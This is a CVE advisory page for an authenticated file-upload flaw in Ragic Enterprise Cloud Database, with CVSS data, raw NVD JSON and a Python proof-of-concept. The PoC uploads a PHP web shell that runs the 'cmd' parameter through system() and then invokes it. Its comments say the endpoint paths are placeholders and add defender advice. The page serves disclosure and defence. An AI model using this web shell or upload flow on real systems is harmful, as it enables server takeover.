Security Vulnerability Report
CVE-2025-11675 CVSS 7.2 HIGH

CVE-2025-11675

Published: 2025-10-13 08:15:41
Last Modified: 2026-04-15 00:35:42

Description

Enterprise Cloud Database developed by Ragic has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score
7.2 (CVSS v3.1 base score; the raw record below also lists a CVSS v4.0 base score of 8.6)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ragic Enterprise Cloud Database (specific affected versions pending official confirmation)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11675 - Ragic Enterprise Cloud Database Arbitrary File Upload PoC
#
# Illustrates the CWE-434 pattern from the advisory: an authenticated,
# high-privilege account (PR:H) uploads a server-side script and then
# requests it so that the server executes it.
#
# NOTE(review): the advisory text on this page names no upload endpoint, form
# field, storage path or server-side script type. The /login, /api/upload and
# /uploads/shell.php values and the PHP payload are placeholders in this
# listing, so read it as an illustration of the bug class rather than a
# verified reproduction of the Ragic issue.
#
# Defender view of the same flow: a multipart upload whose filename carries a
# script extension, followed by a GET for that file with a `cmd` query
# parameter. Allowlisting extension and content on upload, and serving uploads
# from a non-executable location outside the web root, break steps 2 and 3.

import requests

# Target configuration
TARGET_URL = "https://target-ragic-instance.com"
UPLOAD_ENDPOINT = "/api/upload"  # placeholder: adjust based on actual endpoint
SHELL_PATH = "/uploads/shell.php"  # placeholder: path the upload is assumed to be served from

# Account used for the upload; the CVSS vector requires high privileges (PR:H)
USERNAME = "admin"
PASSWORD = "password123"

# Payload: minimal PHP page that hands the `cmd` request parameter to system()
WEBSHELL_CONTENT = b"""<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>"""


def exploit():
    """Run the three-step flow against TARGET_URL and print each result.

    Logs in with USERNAME/PASSWORD, uploads WEBSHELL_CONTENT as ``shell.php``,
    then requests SHELL_PATH with ``cmd=id`` and reports whether ``uid=``
    appears in the response body. Returns None; all output goes to stdout.
    """
    client = requests.Session()

    # Step 1: authenticate. The status code is printed but never checked, so
    # a failed login does not stop the remaining steps.
    login_reply = client.post(
        TARGET_URL + "/login",
        data={"username": USERNAME, "password": PASSWORD},
    )
    print(f"[*] Login response: {login_reply.status_code}")

    # Step 2: multipart upload of the payload on the authenticated session.
    payload_part = ("shell.php", WEBSHELL_CONTENT, "application/x-php")
    upload_reply = client.post(
        TARGET_URL + UPLOAD_ENDPOINT,
        files={"file": payload_part},
    )
    print(f"[*] Upload response: {upload_reply.status_code}")

    # Step 3: request the uploaded file. This goes through a fresh
    # requests.get, not the session, so it only works if the upload path is
    # served without authentication.
    probe_reply = requests.get(TARGET_URL + SHELL_PATH + "?cmd=id")
    body = probe_reply.text
    print(f"[*] Shell execution response: {body}")

    # "uid=" is how Unix `id` output begins; any other body (including one
    # from a non-Unix host) is reported as a possible failure.
    if "uid=" not in body:
        print("[-] Exploit may have failed. Check target manually.")
    else:
        print("[+] Exploit successful! Remote code execution achieved.")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11675", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:41.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Enterprise Cloud Database developed by Ragic has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", 
"providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10424-4e42c-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10423-a3861-1.html", "source": "[email protected]"}]}}